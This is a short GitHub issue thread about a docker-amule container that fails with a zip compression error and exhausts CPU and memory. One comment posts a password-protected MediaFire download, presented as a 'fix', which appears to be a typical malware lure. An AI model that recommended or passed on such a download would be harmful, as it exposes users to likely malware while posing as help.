### ISSUE TITLE
Error  unsupported Zip compression method

### ISSUE THREAD

**Issue by Baluar81** [ngosang/docker-amule#54]
Greetings!

Since a couple of weeks i have this error when start this docker on my machine. Memory and CPu use increases untill blocking the system. I try to recreate the container ande the problem persists.

Thanks in advance!

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by teopost** [comment]
+1

**Comment by ngosang** [comment]
https://github.com/ngosang/docker-amule/issues/51
